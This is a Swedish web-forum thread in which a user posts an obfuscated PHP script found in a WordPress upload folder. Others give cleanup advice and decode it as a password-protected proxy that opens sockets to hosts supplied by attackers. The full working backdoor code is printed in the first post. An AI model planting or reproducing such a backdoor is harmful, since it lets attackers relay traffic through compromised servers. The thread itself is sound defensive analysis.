Kom ihåg mig?
Home Menu

Menu


Elakt skript

Ämnesverktyg Visningsalternativ
Oläst 2009-12-18, 09:08 #1
mephisto73s avatar
mephisto73 mephisto73 är inte uppkopplad
Mycket flitig postare
 
Reg.datum: Jan 2008
Inlägg: 730
mephisto73 mephisto73 är inte uppkopplad
Mycket flitig postare
mephisto73s avatar
 
Reg.datum: Jan 2008
Inlägg: 730
Standard Elakt skript

Jag hittade följande script på en av mina wordpressinstallationer (i upload mappen). Någon som vet vad den gör?

Kod:
<? function _1679490774($i){$a=Array('NWY0YjY3YjM1MWU0NjVmYjRjMmYyMzRlMjA4ZmYwYjg=','cXVlcnk=','aG9zdA==','c2VjcmV0','Q29udGVudC10eXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0=','IA==','Kw==','cXVlcnk=','Og==','IA==','Kw==','aG9zdA==');return base64_decode($a[$i]);} ?><?php $_0=_1679490774(0);if(isset($_POST[_1679490774(1)])&& isset($_POST[_1679490774(2)])){if(isset($_1)&&(md5(md5($_POST[_1679490774(3)]))!= $_0))exit;header(_1679490774(4));@set_time_limit(0);$_2=base64_decode(str_replace(_1679490774(5),_1679490774(6),$_POST[_1679490774(7)]));list($_3,$_4)=explode(_1679490774(8),base64_decode(str_replace(_1679490774(9),_1679490774(10),$_POST[_1679490774(11)])));if(!$_4)$_4=80;$_5=gethostbyname($_3);if($_6=@fsockopen($_5,$_4,$_7,$_8,20)){fwrite($_6,$_2);while(!feof($_6)){$_9=fread($_6,1024);echo $_9;}fclose($_6);}exit;} ?>
mephisto73 är inte uppkopplad   Svara med citatSvara med citat
Oläst 2009-12-18, 09:59 #2
Danieloss avatar
Danielos Danielos är inte uppkopplad
Klarade millennium-buggen
 
Reg.datum: Oct 2005
Inlägg: 3 102
Danielos Danielos är inte uppkopplad
Klarade millennium-buggen
Danieloss avatar
 
Reg.datum: Oct 2005
Inlägg: 3 102
Hade du kört mod security hade det där skriptet aldrig kunnat laddas upp.
Danielos är inte uppkopplad   Svara med citatSvara med citat
Oläst 2009-12-18, 12:23 #3
Jonas Jonas är inte uppkopplad
Klarade millennium-buggen
 
Reg.datum: Feb 2004
Inlägg: 3 364
Jonas Jonas är inte uppkopplad
Klarade millennium-buggen
 
Reg.datum: Feb 2004
Inlägg: 3 364
hade du kört senaste versionen av WP så hade det nog inte hamnat där.
Jonas är inte uppkopplad   Svara med citatSvara med citat
Oläst 2009-12-18, 13:09 #4
emilvs avatar
emilv emilv är inte uppkopplad
Bara ett inlägg till!
 
Reg.datum: Feb 2004
Inlägg: 1 564
emilv emilv är inte uppkopplad
Bara ett inlägg till!
emilvs avatar
 
Reg.datum: Feb 2004
Inlägg: 1 564
Som svar på frågan: Det gör garanterat något busigt. Du bör kolla så att inga filer på ditt konto blivit ändrade nyligen, ta bort det där skriptet och se till att du kör den senaste versionen av både Wordpress och alla eventuella plugins.
emilv är inte uppkopplad   Svara med citatSvara med citat
Oläst 2009-12-18, 13:33 #5
Jonas Jonas är inte uppkopplad
Klarade millennium-buggen
 
Reg.datum: Feb 2004
Inlägg: 3 364
Jonas Jonas är inte uppkopplad
Klarade millennium-buggen
 
Reg.datum: Feb 2004
Inlägg: 3 364
Base64 arrayen innehåller följande:
Kod:
5f4b67b351e465fb4c2f234e208ff0b8
query
host
secret
Content-type: application/octet-stream
 
+
query
:
 
+
host
Scriptet tar emot argument via POST, som öppnar en socket mot en host.

Scriptet i sig gör ingen skada på dina filer, utan är mest ett "proxy" script.
Jonas är inte uppkopplad   Svara med citatSvara med citat
Oläst 2009-12-18, 23:56 #6
mephisto73s avatar
mephisto73 mephisto73 är inte uppkopplad
Mycket flitig postare
 
Reg.datum: Jan 2008
Inlägg: 730
mephisto73 mephisto73 är inte uppkopplad
Mycket flitig postare
mephisto73s avatar
 
Reg.datum: Jan 2008
Inlägg: 730
Ok. Jag har redan uppgraderat och rensat, det var en gammal oanvänd installation, men i alla fall...

Tack för svaret.
mephisto73 är inte uppkopplad   Svara med citatSvara med citat
Svara


Aktiva användare som för närvarande tittar på det här ämnet: 1 (0 medlemmar och 1 gäster)
 

Regler för att posta
Du får inte posta nya ämnen
Du får inte posta svar
Du får inte posta bifogade filer
Du får inte redigera dina inlägg

BB-kod är
Smilies är
[IMG]-kod är
HTML-kod är av

Forumhopp


Alla tider är GMT +2. Klockan är nu 12:05.

Programvara från: vBulletin® Version 3.8.2
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Svensk översättning av: Anders Pettersson
 
Copyright © 2017